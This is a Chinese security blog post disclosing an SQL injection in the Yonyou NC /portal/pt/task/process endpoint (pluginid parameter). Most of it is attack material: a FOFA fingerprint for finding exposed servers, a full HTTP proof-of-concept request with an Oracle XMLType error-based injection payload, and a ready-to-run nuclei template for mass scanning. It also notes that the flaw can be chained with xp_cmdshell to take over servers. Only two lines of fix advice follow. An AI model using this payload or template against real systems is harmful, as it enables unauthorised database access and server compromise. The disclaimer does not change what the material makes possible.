【SQL注入】用友NC process SQL注入漏洞

发布于 作者:

【SQL注入】用友NC process SQL注入漏洞

原创 1ang 小羊安全屋 2024-11-25 06:49

导言

文章仅用作网络安全人员对自己网站、服务器等进行自查检测,不可用于其他用途,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。切勿用于网络攻击!!!

PART 

漏洞描述

用友NC /portal/pt/task/process 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

漏洞复现

漏洞URL:/portal/pt/task/process

漏洞参数:pluginid

F  O F A:icon_hash=”1085941792″

漏洞详情:

1、打开系统

2、使用poc进行检测 

POST /portal/pt/task/process?pageId=login HTTP/1.1
Host: 127.0.0.1:5001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A7ED8D2420C0517E62D9552E4831698B.server
Content-Type: application/x-www-form-urlencoded
Content-Length: 279


id=1&oracle=1&pluginid=1{{urlescape(' AND 7194=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7194=7194) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- dJyN)}}

2、漏洞利用成功

nuclei脚本 

id: 用友NC processSQL注入

info:
  name: 用友NC processSQL注入
  author: 1ang
  severity: high
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |-
        POST /portal/pt/task/process?pageId=login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: JSESSIONID=A7ED8D2420C0517E62D9552E4831698B.server
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 279


        id=1&oracle=1&pluginid=1{{urlescape(' AND 7194=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7194=7194) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- dJyN)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - qqbbq1qxxqq
      - type: status
        status:
          - 200

修复建议

1、升级到最新版本;

2、关闭系统互联网访问权限,或使用白名单访问。

个人星球,欢迎加入

——The  End——